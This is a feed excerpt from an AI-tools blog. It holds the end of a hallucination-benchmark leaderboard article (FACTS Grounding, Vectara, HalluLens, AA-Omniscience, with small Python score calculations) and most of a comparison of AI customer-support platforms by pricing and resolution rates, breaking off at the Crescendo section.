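print(round(facts_grounding_score(examples), 1))  # 55.6
</code></pre>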
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>FACTS Grounding Score</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Gemini 2.0 Flash Experimental</td>
          <td>Google</td>
          <td>83.6%</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Gemini 1.5 Flash</td>
          <td>Google</td>
          <td>82.9%</td>
      </tr>
      <tr>
          <td>3</td>
          <td>Gemini 1.5 Pro</td>
          <td>Google</td>
          <td>80.0%</td>
      </tr>
      <tr>
          <td>4</td>
          <td>Claude 3.5 Sonnet</td>
          <td>Anthropic</td>
          <td>79.4%</td>
      </tr>
      <tr>
          <td>5</td>
          <td>GPT-4o</td>
          <td>OpenAI</td>
          <td>78.8%</td>
      </tr>
  </tbody>
</table>
<p><em>Source: FACTS Grounding paper (arxiv 2501.03200), original leaderboard results from January 2025.</em></p>
<p>Google's models dominate the top three, which isn't surprising given they designed the benchmark - though the research team took care to use a multi-judge setup and include non-Google judges. Claude 3.5 Sonnet and GPT-4o are close behind, both above 78%.</p>
<p>The FACTS Benchmark Suite (announced in early 2026) expands this to four dimensions: Grounding v2, Parametric, Search, and Multimodal. Under that harder suite, Gemini 3 Pro leads with an overall FACTS Score of 68.8%, and no model breaks 70%. The added difficulty comes from longer documents and more complex reasoning requirements. The full suite is described on the <a href="https://deepmind.google/blog/facts-benchmark-suite-systematically-evaluating-the-factuality-of-large-language-models/">Google DeepMind FACTS Benchmark Suite blog post</a>.</p>
<p>A caveat worth noting: the research team found models rate their own outputs 3.23 percentage points higher than those from competing providers on average, which is why the multi-judge approach matters. Single-judge evaluations of grounding are suspect.</p>
<h2 id="vectara-hhem-leaderboard">Vectara HHEM Leaderboard</h2>
<p>Vectara's hallucination leaderboard, now in its second generation, measures how often models introduce unsupported information when summarizing documents. The evaluation uses Vectara's HHEM-2.3 model (with a FaithJudge approach for some comparisons) to score factual consistency.</p>
<p>The refreshed dataset expanded from 1,000 to 7,700+ articles spanning law, medicine, finance, technology, education, sports, and news. Articles now reach 32K tokens, which is a meaningful difficulty increase. The leaderboard was last updated March 20, 2026.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>Hallucination Rate</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>finix_s1_32b</td>
          <td>Ant Group</td>
          <td>1.8%</td>
      </tr>
      <tr>
          <td>2</td>
          <td>gpt-5.4-nano</td>
          <td>OpenAI</td>
          <td>3.1%</td>
      </tr>
      <tr>
          <td>3</td>
          <td>gemini-2.5-flash-lite</td>
          <td>Google</td>
          <td>3.3%</td>
      </tr>
      <tr>
          <td>4</td>
          <td>Phi-4</td>
          <td>Microsoft</td>
          <td>3.7%</td>
      </tr>
      <tr>
          <td>5</td>
          <td>Llama-3.3-70B-Instruct-Turbo</td>
          <td>Meta</td>
          <td>4.1%</td>
      </tr>
  </tbody>
</table>
<p><em>Source: Vectara hallucination leaderboard GitHub (last updated March 20, 2026). Lower hallucination rate = better.</em></p>
<p>The top result from Ant Group's finix_s1_32b at 1.8% is impressive, though this is a less-known model with limited independent benchmarking. The more notable finding from the updated leaderboard: reasoning-focused frontier models - GPT-5, Claude Sonnet 4.5, and Grok-4 - all show hallucination rates above 10% on the harder dataset. Vectara's explanation is that these models &quot;overthink&quot; summarization, deviating from source material in ways that smaller, more focused models don't.</p>
<p>This has direct implications for RAG pipelines. Our <a href="/leaderboards/rag-benchmarks-leaderboard/">RAG Benchmarks Leaderboard</a> covers the retrieval side; on the generation side, these hallucination rates suggest that raw intelligence and grounding faithfulness don't move together.</p>
<p><img src="/images/leaderboards/hallucination-benchmarks-leaderboard-fact-checking.jpg" alt="A person reviewing document carefully using a magnifying glass - representing detailed fact-checking of AI outputs">
<em>Careful verification of AI outputs remains necessary given hallucination rates that persist even in frontier models.</em>
<small>Source: pexels.com</small></p>
<h2 id="hallulens-and-halueval">HalluLens and HaluEval</h2>
<p>HaluEval (RUCAIBox, EMNLP 2023) is a research benchmark with 35,000 examples across question answering, knowledge-grounded dialogue, and text summarization. It found that ChatGPT produced hallucinated content in roughly 19.5% of user queries when prompted in specific topic domains. It doesn't maintain a live leaderboard, but it's widely used in academic hallucination research as a standard evaluation set.</p>
<p>HalluLens (Meta FAIR, ACL 2025) goes further by distinguishing extrinsic from intrinsic hallucinations. The key result: Llama-3.1-405B-Instruct showed the lowest false acceptance rate (6.88%) on non-existent entity prompts, while some Mistral variants hit rates above 80%. GPT-4o balanced precision and recall best across tasks, scoring 52.59% accuracy on PreciseWikiQA.</p>
<p>The benchmark creates test sets dynamically to prevent data leakage - a design choice that matters for assessing newer models that may have trained on older static benchmarks.</p>
<h2 id="aa-omniscience">AA-Omniscience</h2>
<p>Artificial Analysis released AA-Omniscience in early 2026 as a knowledge and hallucination benchmark that jointly rewards correct answers and penalizes hallucinations. The scoring metric, the AA-Omniscience Index, runs from -100 to 100: a score of 0 means the model is equally likely to be right as wrong.</p>
<p>The 6,000 questions span 42 economically relevant topics across six domains. A key design choice: abstaining when uncertain is rewarded, unlike benchmarks that count refusals as failures.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>AA-Omniscience Index</th>
          <th>Hallucination Rate</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Gemini 3.1 Pro Preview</td>
          <td>Google</td>
          <td>33</td>
          <td>~50%</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Claude Opus 4.7 (Adaptive Reasoning)</td>
          <td>Anthropic</td>
          <td>26</td>
          <td>-</td>
      </tr>
      <tr>
          <td>3</td>
          <td>Gemini 3 Pro Preview</td>
          <td>Google</td>
          <td>16</td>
          <td>~88%</td>
      </tr>
      <tr>
          <td>-</td>
          <td>Grok 4.20 (Reasoning)</td>
          <td>xAI</td>
          <td>-</td>
          <td>17% (lowest)</td>
      </tr>
      <tr>
          <td>-</td>
          <td>Claude 4.5 Haiku</td>
          <td>Anthropic</td>
          <td>-</td>
          <td>25%</td>
      </tr>
  </tbody>
</table>
<p><em>Source: artificialanalysis.ai/evaluations/omniscience. AA-Omniscience Index measures net factual reliability; hallucination rate is incorrect answers as a fraction of all non-correct responses.</em></p>
<p>The highest AA-Omniscience Index belongs to Gemini 3.1 Pro Preview at 33. Grok 4.20 in reasoning mode achieves the lowest raw hallucination rate at 17%. Claude 4.5 Haiku comes in third on hallucination rate at 25% - an interesting result for a smaller, non-reasoning model.</p>
<p>The gap between the accuracy ranking and the index ranking shows why the metric design matters. Gemini 3 Pro has a higher raw accuracy (56%) than Gemini 3.1 Pro Preview (55%), but its hallucination rate of ~88% drags the index down severely. A model that guesses more and is wrong more often gets penalized harder under this scoring system, which better reflects real-world reliability requirements.</p>
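<p>Working through the arithmetic makes the divergence concrete. Assuming the index is simply percent correct minus percent incorrect (consistent with &quot;0 means equally likely to be right as wrong&quot;) and using the hallucination-rate definition from the source note, the published figures fall out within rounding:</p>
<pre><code class="language-python"># Reconstructing the AA-Omniscience Index from accuracy and hallucination rate.
# The index formula here is an assumption consistent with the description above;
# Artificial Analysis's exact weighting may differ.
def omniscience_index(accuracy, hallucination_rate):
    # hallucination_rate = incorrect / (incorrect + abstained), per the source note
    incorrect = hallucination_rate * (1.0 - accuracy)
    return 100 * (accuracy - incorrect)

print(round(omniscience_index(0.55, 0.50), 1))  # Gemini 3.1 Pro Preview: 32.5 (reported 33)
print(round(omniscience_index(0.56, 0.88), 1))  # Gemini 3 Pro Preview: 17.3 (reported 16)
</code></pre>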
<h2 id="key-takeaways">Key Takeaways</h2>
<h3 id="no-single-benchmark-tells-the-whole-story">No single benchmark tells the whole story</h3>
<p>A model that ranks first on TruthfulQA may not rank first on SimpleQA, and a model that grounds faithfully to documents (FACTS Grounding) may still hallucinate during open-ended generation (AA-Omniscience). The leaderboards need to be read together. Our <a href="/leaderboards/overall-llm-rankings-apr-2026/">overall LLM rankings</a> cover aggregate performance, but factuality is best assessed per-use-case.</p>
<h3 id="reasoning-models-introduce-a-grounding-tradeoff">Reasoning models introduce a grounding tradeoff</h3>
<p>The Vectara finding that GPT-5, Claude Sonnet 4.5, and Grok-4 exceed 10% hallucination rates on their harder dataset is consistent with a pattern showing up across evaluations: chain-of-thought reasoning helps with tasks that need derivation, but it can hurt faithfulness on tasks that just need the model to stick to what's in front of it. If your application is document-grounded (RAG, summarization, contract review), a smaller, more focused model may serve you better than the biggest frontier reasoning model.</p>
<h3 id="benchmark-contamination-is-a-real-concern-for-truthfulqa">Benchmark contamination is a real concern for TruthfulQA</h3>
<p>TruthfulQA's age (2021) and public availability mean that training datasets likely include examples similar to its questions. SimpleQA was designed to ease this by using a withheld question set. FACTS Grounding uses a private held-out set for the same reason. When evaluating new models, weight newer and harder benchmarks more heavily.</p>
<h3 id="open-source-models-can-match-or-exceed-closed-models-on-factuality">Open-source models can match or exceed closed models on factuality</h3>
<p>Phi-3.5-MoE-instruct leads TruthfulQA. Llama-3.1-405B-Instruct performs best on HalluLens extrinsic hallucinations. Ant Group's finix_s1_32b leads the Vectara leaderboard. The narrative that frontier closed models are always more accurate doesn't hold up across these benchmarks.</p>
<h2 id="practical-guidance">Practical Guidance</h2>
<p><strong>For document-grounded applications</strong> (summarization, contract review, RAG): Focus on FACTS Grounding and Vectara HHEM scores. Prefer models that score above 78% on FACTS Grounding. Avoid reasoning-heavy models unless you've tested their grounding behavior on your specific document types.</p>
<p><strong>For factual Q&amp;A assistants</strong> (research tools, knowledge bases): Use SimpleQA as your primary signal. Top performers are Gemini 2.5 Pro (53.0%), the Qwen3 235B family (50.6%), and GPT-4.1 (40.4%). The field average of 20.8% means you should build retrieval augmentation into any production system rather than relying on parametric knowledge alone.</p>
<p><strong>For general trust calibration</strong>: AA-Omniscience gives the most complete picture because it penalizes overconfidence. Models with a high index score are doing something real - they're either answering correctly more often, hedging appropriately, or both.</p>
<p><strong>Budget-conscious options</strong>: Phi-3.5-MoE-instruct punches above its weight class on TruthfulQA. Gemini 2.5 Flash Lite sits near the top of the Vectara leaderboard at a 3.3% hallucination rate. Smaller models with factuality-focused training can outperform larger general-purpose models on specific tasks.</p>
<hr>
<h2 id="faq">FAQ</h2>
<h3 id="which-model-has-the-lowest-hallucination-rate-in-2026">Which model has the lowest hallucination rate in 2026?</h3>
<p>On the Vectara summarization benchmark, Ant Group's finix_s1_32b leads at 1.8%. On AA-Omniscience, Grok 4.20 in reasoning mode reaches the lowest raw hallucination rate at 17%.</p>
<h3 id="what-is-simpleqa-and-why-does-it-matter">What is SimpleQA and why does it matter?</h3>
<p>SimpleQA is OpenAI's 4,326-question benchmark for short-form factual accuracy. It's considered more contamination-resistant than TruthfulQA because it used a withheld question set at launch. The field average score of 20.8% shows factual recall remains a weak point across models.</p>
<h3 id="does-truthfulqa-still-matter-in-2026">Does TruthfulQA still matter in 2026?</h3>
<p>It's useful but limited. The benchmark dates to 2021, is publicly available, and likely appears in training data. It's also small (817 questions). Use it as a sanity check, not a primary signal. SimpleQA and FACTS Grounding are more reliable for current model comparisons.</p>
<h3 id="why-do-reasoning-models-hallucinate-more-on-summarization">Why do reasoning models hallucinate more on summarization?</h3>
<p>Vectara's leaderboard data suggests reasoning models deviate from source documents because their chain-of-thought process adds inferences beyond what's written. Document summarization rewards strict faithfulness, not elaboration - a task better suited to smaller, focused models.</p>
<h3 id="what-does-the-facts-benchmark-suite-measure-beyond-the-original">What does the FACTS Benchmark Suite measure beyond the original?</h3>
<p>The full FACTS Suite adds Parametric (knowledge without retrieval), Search (using web search tools), and Multimodal (image-grounded factuality) on top of the original Grounding benchmark. No model has topped 70% average across all four components as of April 2026.</p>
<hr>
<p><strong>Sources:</strong></p>
<ul>
<li><a href="https://arxiv.org/abs/2109.07958">TruthfulQA paper (arxiv 2109.07958)</a></li>
<li><a href="https://llm-stats.com/benchmarks/truthfulqa">TruthfulQA leaderboard at llm-stats.com</a></li>
<li><a href="https://pricepertoken.com/leaderboards/benchmark/simpleqa">SimpleQA leaderboard at pricepertoken.com</a></li>
<li><a href="https://arxiv.org/abs/2501.03200">FACTS Grounding paper (arxiv 2501.03200)</a></li>
<li><a href="https://deepmind.google/blog/facts-grounding-a-new-benchmark-for-evaluating-the-factuality-of-large-language-models/">FACTS Grounding - Google DeepMind blog</a></li>
<li><a href="https://github.com/vectara/hallucination-leaderboard">Vectara hallucination leaderboard (GitHub)</a></li>
<li><a href="https://www.vectara.com/blog/introducing-the-next-generation-of-vectaras-hallucination-leaderboard">Vectara next-gen leaderboard announcement</a></li>
<li><a href="https://arxiv.org/abs/2305.11747">HaluEval paper (arxiv 2305.11747)</a></li>
<li><a href="https://arxiv.org/abs/2504.17550">HalluLens paper (arxiv 2504.17550)</a></li>
<li><a href="https://artificialanalysis.ai/evaluations/omniscience">AA-Omniscience benchmark - Artificial Analysis</a></li>
<li><a href="https://arxiv.org/abs/2310.00741">FELM paper (arxiv 2310.00741)</a></li>
</ul>
]]></content:encoded><dc:creator>James Kowalski</dc:creator><category>Leaderboards</category><media:content url="https://awesomeagents.ai/images/leaderboards/hallucination-benchmarks-leaderboard_hu_89f6d3fa38acfbf5.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/leaderboards/hallucination-benchmarks-leaderboard_hu_89f6d3fa38acfbf5.jpg" width="1200" height="675"/></item><item><title>Best AI Customer Support Tools 2026: 12 Platforms</title><link>https://awesomeagents.ai/tools/best-ai-customer-support-tools-2026/</link><pubDate>Fri, 17 Apr 2026 20:08:49 +0200</pubDate><guid>https://awesomeagents.ai/tools/best-ai-customer-support-tools-2026/</guid><description>&lt;p>Customer support AI has split into two distinct leagues. On one side sit the incumbents - Zendesk, Salesforce, HubSpot - bolting AI onto existing seat-based products. On the other are purpose-built AI-native players like Intercom Fin, Decagon, Sierra, and Ada, which rebuilt the product layer around resolution-based outcomes from the start. The pricing model difference matters more than feature lists: per-seat pricing incentivizes adding agents, per-resolution pricing forces vendors to actually solve tickets.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>Customer support AI has split into two distinct leagues. On one side sit the incumbents - Zendesk, Salesforce, HubSpot - bolting AI onto existing seat-based products. On the other are purpose-built AI-native players like Intercom Fin, Decagon, Sierra, and Ada, which rebuilt the product layer around resolution-based outcomes from the start. The pricing model difference matters more than feature lists: per-seat pricing incentivizes adding agents, per-resolution pricing forces vendors to actually solve tickets.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li><strong>Best for mid-market SaaS and consumer tech:</strong> Intercom Fin 3 at $0.99/resolution, 66% average resolution rate across 6,000+ customers, voice included</li>
<li><strong>Best for e-commerce:</strong> Gorgias AI at $0.90-$1.00/automated resolution - native Shopify/BigCommerce order data in every ticket</li>
<li><strong>Best for large enterprise with Salesforce investment:</strong> Agentforce at $2/conversation, but the TCO is high once Service Cloud licenses stack up</li>
<li>Decagon and Sierra are the most credible pure-play options for enterprises willing to pay minimum-contract rates; both have real deployment data (Chime, Substack, Rivian, SiriusXM)</li>
<li>Forethought is now part of Zendesk after a March 2026 acquisition - buying it today means buying into the Zendesk ecosystem</li>
<li>Resolution rate marketing numbers are largely unverified vendor claims; treat them as upper bounds, not baselines</li>
</ul>
</div>
<p>This comparison covers 12 platforms across the following dimensions: pricing model, verified resolution claims, channel coverage (web chat, email, voice, WhatsApp), helpdesk integration depth, voice agent support, workflow flexibility, self-hosting options, and publicly named customer deployments.</p>
<hr>
<h2 id="how-to-read-the-comparison-table">How to Read the Comparison Table</h2>
<p>&quot;Resolution rate&quot; numbers in this article come directly from vendor marketing materials unless otherwise noted. Vendors control the definition of &quot;resolved&quot; - some require a customer confirmation click, others count any conversation that didn't escalate. That makes cross-vendor comparisons unreliable. Where I have third-party deployment data (Klarna, Chime, Substack), I've called it out explicitly.</p>
<table>
  <thead>
      <tr>
          <th>Platform</th>
          <th>Pricing model</th>
          <th>Published resolution rate</th>
          <th>Voice</th>
          <th>Self-host</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Intercom Fin 3</td>
          <td>$0.99/resolution</td>
          <td>66% avg (Fin 2 data)</td>
          <td>Yes</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Zendesk AI Agents</td>
          <td>$1.50-$2.00/automated resolution</td>
          <td>Not published</td>
          <td>Via add-on</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Agentforce (Salesforce)</td>
          <td>$2.00/conversation + seat licenses</td>
          <td>Not published</td>
          <td>Via Salesforce Contact Center</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Decagon</td>
          <td>Contact sales (enterprise)</td>
          <td>70-90% (customer-specific)</td>
          <td>Yes</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Sierra</td>
          <td>$150K+/year minimum</td>
          <td>Not published</td>
          <td>Yes (voice-first)</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Ada</td>
          <td>~$30K/year minimum, ~$1-$3.50/resolution</td>
          <td>Not published</td>
          <td>Via integration</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Forethought (now Zendesk)</td>
          <td>Custom quote (~$56K/year median)</td>
          <td>Up to 98% (vendor claim)</td>
          <td>Yes</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Kustomer</td>
          <td>$0.60/engaged conversation + $89/seat base</td>
          <td>40% (Vuori deployment)</td>
          <td>Yes (native)</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Crescendo</td>
          <td>$2.99/resolution + $2,900/month base</td>
          <td>70-90% (vendor claim)</td>
          <td>Yes</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Gorgias AI</td>
          <td>$0.90-$1.00/automated resolution</td>
          <td>60% (vendor claim)</td>
          <td>No</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Help Scout AI</td>
          <td>$0.75/AI-resolved conversation</td>
          <td>Not published</td>
          <td>No</td>
          <td>No</td>
      </tr>
      <tr>
          <td>HubSpot Service Hub</td>
          <td>~$1/conversation (Breeze credits)</td>
          <td>Not published</td>
          <td>Via separate telephony</td>
          <td>No</td>
      </tr>
  </tbody>
</table>
<hr>
<h2 id="intercom-fin-3---best-overall-for-saas-support">Intercom Fin 3 - Best Overall for SaaS Support</h2>
<p>Fin 3 shipped at Intercom's Pioneer 2025 event and is the most significant platform update in the product's history. The jump from Fin 2 to Fin 3 isn't incremental: Procedures replace the old content-matching approach with a system combining natural language instructions and deterministic controls. You write the resolution logic in plain English, add API connectors and conditional branches, and Fin executes them as workflows - processing refunds, verifying account status, filing claims.</p>
<p>The Fin 2 dataset is the most credible published resolution benchmark in the category: 66% average across 6,000+ customers, with over 20% of those customers topping 80%. Intercom also offers a 50% automation rate guarantee - if Fin resolves less than half the conversations it touches, they credit back the difference.</p>
<p>Pricing is $0.99 per outcome. An outcome is either a resolution (the customer confirms the issue is solved) or a successful Procedure handoff. You pay once per conversation regardless of how many exchanges it took. Plans start at $29/seat/month (Essential), $85/seat/month (Advanced), and $132/seat/month (Expert), with Fin billed separately.</p>
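<p>To make the outcome-based model concrete, here is a minimal back-of-envelope sketch in Python. The volumes are illustrative assumptions (the 66% figure is the published Fin 2 average), and the guarantee-credit line reflects one reading of the 50% automation guarantee, not a confirmed billing formula.</p>
<pre><code class="language-python"># Back-of-envelope monthly cost for Intercom Fin 3 under outcome-based billing.
# All volumes below are illustrative assumptions, not Intercom-published figures.
seats = 10
seat_price = 29.0            # Essential plan, per seat per month
conversations = 4_000        # conversations Fin touches per month (assumption)
resolution_rate = 0.66       # published Fin 2 average

outcomes = conversations * resolution_rate
total = seats * seat_price + outcomes * 0.99

# One reading of the 50% automation guarantee: if Fin resolves fewer than half
# the conversations it touches, the shortfall is credited back.
if resolution_rate < 0.50:
    total -= (0.50 - resolution_rate) * conversations * 0.99

print(f"Estimated outcomes: {outcomes:.0f}, monthly cost: ${total:,.2f}")
</code></pre>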
<h3 id="whats-new-in-fin-3">What's new in Fin 3</h3>
<ul>
<li><strong>Simulations</strong> - automated test suites that run Procedures against synthetic customer scenarios before you deploy. This is a genuine engineering QA feature, not a marketing checkbox.</li>
<li><strong>Expanded channels</strong> - Slack and Discord support added. Voice latency dropped 30-40%, and voice coverage now spans 28 languages.</li>
<li><strong>Multimodal inputs</strong> - Fin can read screenshots and invoice images customers attach to conversations, reducing &quot;I can't read what you sent&quot; escalations.</li>
</ul>
<p><strong>Weakness:</strong> Fin is deeply tied to the Intercom platform. If you're on Zendesk or Freshdesk, deploying Fin means either migrating your helpdesk or running two systems in parallel. Intercom doesn't offer a standalone &quot;Fin layer&quot; over third-party ticketing.</p>
<p><strong>Deployment scale:</strong> Intercom hasn't published a curated deployment list with resolution numbers, but claims 40M+ resolved conversations across all Fin customers.</p>
<hr>
<h2 id="zendesk-ai-agents---best-for-existing-zendesk-shops">Zendesk AI Agents - Best for Existing Zendesk Shops</h2>
<p>Zendesk picked up Ultimate AI in May 2023 and spent the following 18 months integrating it into Suite. The result is two AI agent tiers built into the Suite platform.</p>
<p>The Essential tier - included with all Suite plans - generates responses from your Help Center content without configuration. The Advanced tier ($50/agent/month add-on for Suite Professional at $115/agent/month) adds hybrid conversation flows combining generative AI with scripted paths, API orchestration, and analytics.</p>
<p>Automated resolution pricing is separate: each plan includes a free AR quota per agent per month. Beyond that, you pay $1.50/AR on committed volume or $2.00/AR on pay-as-you-go. The Ultimate tier runs $139/agent/month and includes skill-based routing, live dashboards, and extended API limits.</p>
<p>The Forethought acquisition (March 2026) is strategically significant - Zendesk's largest deal in nearly two decades. Forethought adds five AI &quot;agents&quot; - Solve, Triage, Assist, Discover, and Agent QA - that work across email, chat, voice, and SMS. If you're already on Zendesk, the combined platform is now the most feature-complete option in the market. If you're not, the switching cost is high.</p>
<p><strong>Voice:</strong> Available via Zendesk Talk, priced separately. Not native to the AI agent tier.</p>
<p><strong>Weakness:</strong> The per-seat pricing model means AI costs compound on top of agent seat costs. A team of 50 agents on Suite Professional is already paying $5,750/month before the AI add-on and AR charges.</p>
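<p>A rough sketch of how those layers stack, using the list prices quoted above. The AR volume is an illustrative assumption, and the free per-agent AR quota is ignored for simplicity.</p>
<pre><code class="language-python"># Zendesk Suite Professional + Advanced AI add-on, monthly TCO sketch.
# Seat count and AR volume are assumptions for illustration.
agents = 50
suite_professional = 115.0       # per agent per month
advanced_ai_addon = 50.0         # per agent per month
automated_resolutions = 8_000    # ARs beyond the included quota (assumption)
ar_rate = 1.50                   # committed-volume rate; $2.00 pay-as-you-go

seat_cost = agents * suite_professional       # $5,750
addon_cost = agents * advanced_ai_addon       # $2,500
ar_cost = automated_resolutions * ar_rate     # $12,000

print(f"Seats ${seat_cost:,.0f} + AI add-on ${addon_cost:,.0f} "
      f"+ ARs ${ar_cost:,.0f} = ${seat_cost + addon_cost + ar_cost:,.0f}/month")
</code></pre>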
<hr>
<h2 id="agentforce-salesforce-einstein-service-ai---best-for-salesforce-shops">Agentforce (Salesforce Einstein Service AI) - Best for Salesforce Shops</h2>
<p>Salesforce rebranded Einstein Service Agent to Agentforce in late 2024. The pitch is autonomous customer self-service without pre-scripted flows - the agent uses a reasoning engine to interpret requests, check Salesforce CRM data, and take action.</p>
<p>The numbers are painful if you're not already embedded in the Salesforce ecosystem. Service Cloud Enterprise runs $165/user/month. Service Cloud Unlimited is $330/user/month. Agentforce conversations are billed at $2 each. A team running 15,000 AI conversations per month faces $30,000/month in conversation costs before licenses.</p>
<p>The implementation timeline is a real constraint: basic Einstein configuration takes 4-8 weeks and usually requires a certified Salesforce partner. A full Agentforce rollout is 3-6 months. Compare that to Fin or Decagon, which ship in days.</p>
<p><strong>What it does well:</strong> If your support data lives in Salesforce CRM - cases, entitlements, contact history, product catalogs - Agentforce's data access is unmatched. No API calls to external systems; it queries your Salesforce org directly. For regulated industries with strict data residency requirements, that's a real advantage.</p>
<p><img src="/images/tools/best-ai-customer-support-tools-2026-team-dashboard.jpg" alt="Customer service team reviewing dashboard analytics">
<em>Support teams using AI platforms spend less time on ticket routing and more time reviewing performance analytics and exception handling.</em>
<small>Source: pexels.com</small></p>
<hr>
<h2 id="decagon---best-pure-play-agentic-option">Decagon - Best Pure-Play Agentic Option</h2>
<p>Decagon is the quietest name on this list and has the most credible third-party resolution numbers. Chime reported 70% AI resolution across chat and voice. Substack reached 90% resolution without human intervention. Bilt Rewards reported 75%. NG.CASH grew autonomous resolution from 13% to 70% over its deployment period.</p>
<p>Those numbers come from publicly verified customer case studies, not aggregate vendor dashboards. That's a meaningful distinction.</p>
<p>Decagon doesn't publish pricing - it's enterprise-only with custom contracts. Third-party sources put it in the same range as Sierra: six-figure annual commitments. The platform supports chat, email, and voice, with deep integrations into Zendesk, Salesforce, and Intercom for helpdesk data access.</p>
<p><strong>What makes Decagon different:</strong> It's not built on a rules engine. Decagon models are trained on each customer's historical support data, producing resolution behavior tuned to that company's specific product and customer patterns. This takes longer to implement than a configuration-based tool, but the resolution accuracy on complex queries is higher.</p>
<p><strong>Weakness:</strong> No self-serve or SMB tier. Decagon won't make sense unless your support volume justifies a dedicated AI implementation project.</p>
<hr>
<h2 id="sierra---best-for-voice-first-enterprise-support">Sierra - Best for Voice-First Enterprise Support</h2>
<p>Sierra, co-founded by Bret Taylor (former Salesforce co-CEO) and Clay Bavor, reached $100M ARR in November 2025 - 21 months after launch. The company was valued at $10 billion following a $350M Greenoaks round in September 2025.</p>
<p>Sierra's positioning is outcomes-based pricing, with contracts starting at $150K/year. Customers include ADT, Bissell, SiriusXM, Cigna, Ramp, Rivian, Discord, and Vans. The mix of tech-native and legacy enterprise deployments is notable - most AI-native support vendors have consumer tech customer lists. Sierra's presence at SiriusXM and Cigna suggests the platform handles regulated, complex support workflows.</p>
<p>Voice is Sierra's strongest differentiator. Most platforms in this list treat voice as a channel add-on. Sierra was voice-first from the beginning and the product architecture reflects it.</p>
<blockquote>
<p>&quot;The era of clicking buttons is over,&quot; Taylor told TechCrunch in April 2026. The implication is that Sierra's agents handle multi-step resolution on the phone, not just deflection.</p></blockquote>
<p><strong>Weakness:</strong> The $150K/year minimum excludes everyone except large enterprises. No published resolution rates from Sierra directly - customer case studies are NDA-protected.</p>
<hr>
<h2 id="ada---established-enterprise-chatbot-layer">Ada - Established Enterprise Chatbot Layer</h2>
<p>Ada has been in the enterprise support automation market since 2016. It's the oldest purpose-built AI support vendor on this list and has built deep integrations with Zendesk and Salesforce. The current product supports web chat, email, and mobile channels with voice available via integrations.</p>
<p>Pricing starts at approximately $30,000/year (per the Salesforce AppExchange listing), with enterprise deals reported in the $100K-$300K range. Resolution pricing is $1-$3.50 per resolved conversation depending on volume and configuration. That upper end gets expensive fast at scale.</p>
<p>Ada is honest in its own pricing guide about the tradeoffs between resolution-based and conversation-based models. Resolution-based pricing creates better incentives: you only pay when the AI actually closes the ticket.</p>
<p><strong>Weakness:</strong> Ada is genuinely expensive and opaque on pricing. The per-resolution rate of $3.50 at low volumes competes unfavorably with Fin's $0.99 flat rate.</p>
<hr>
<h2 id="forethought-now-part-of-zendesk">Forethought (Now Part of Zendesk)</h2>
<p>Zendesk announced the acquisition of Forethought on March 11, 2026 - its largest deal in two decades. The transaction closed by end of March 2026. Today, Forethought operates as a Zendesk product.</p>
<p>If you're assessing Forethought independently, understand what you're buying into. It's now a Zendesk product roadmap. That may be fine - Zendesk has the scale to invest in the technology. But independent Forethought deployments over non-Zendesk helpdesks are likely to see reduced investment over time.</p>
<p>Forethought's five-agent architecture (Solve for automated resolution, Triage for routing, Assist for agent recommendations, Discover for knowledge gaps, Agent QA for quality scoring) is the most thorough AI layer in the category if your helpdesk is already Zendesk. Median contract value before acquisition ran around $56,000-$60,000/year.</p>
<p>Forethought's published resolution claim - &quot;up to 98%&quot; - isn't independently verified. Take it as a best-case ceiling, not an average.</p>
<hr>
<h2 id="kustomer---metas-crm-first-approach">Kustomer - Meta's CRM-First Approach</h2>
<p>Meta acquired Kustomer in 2020 and spun it back out as an independent company in 2023. The current Kustomer product is one of the few platforms on this list that combines a full customer CRM (conversation history, customer profiles, lifetime value data) with native AI agents.</p>
<p>The October 2024 relaunch introduced &quot;disruptive pricing&quot; - conversation-based billing at $0.60 per engaged AI conversation for the customer-facing agent. That's the cheapest per-conversation rate in this comparison. The catch: you pay when the AI engages, not when it resolves. A deflected conversation that fails and escalates still costs $0.60.</p>
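<p>The practical consequence of engagement-based billing is that the effective cost per <em>resolved</em> conversation depends on the resolution rate. A small sketch, using the Vuori 40% figure and an assumed monthly volume:</p>
<pre><code class="language-python"># Effective cost per resolved conversation under engagement-based billing.
# Kustomer bills $0.60 whenever the AI engages, resolved or not.
engaged_conversations = 10_000   # monthly AI engagements (assumption)
price_per_engagement = 0.60
resolution_rate = 0.40           # Vuori deployment figure

billed = engaged_conversations * price_per_engagement     # $6,000
resolved = engaged_conversations * resolution_rate        # 4,000
print(f"Effective cost per resolution: ${billed / resolved:.2f}")   # $1.50
</code></pre>
<p>At that resolution rate, the $0.60 sticker price works out to roughly $1.50 per conversation the AI actually closes - more than Fin's $0.99 flat per-resolution rate.</p>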
<p>Kustomer AI Voice is included at no extra cost beyond standard telephony. That's genuinely competitive: Sierra and Decagon charge enterprise minimums for voice. Kustomer's AI voice is available to anyone on the $89/seat plan.</p>
<p>The Vuori case study is the clearest public deployment data Kustomer has published: 40% of chat conversations resolved by AI without human intervention. That's below Fin and Decagon averages, but Vuori is an apparel e-commerce brand, not a software company - and product return/exchange flows are genuinely harder to automate than software FAQs.</p>
<hr>
<h2 id="crescendo---managed-ai-plus-human-backup">Crescendo - Managed AI Plus Human Backup</h2>
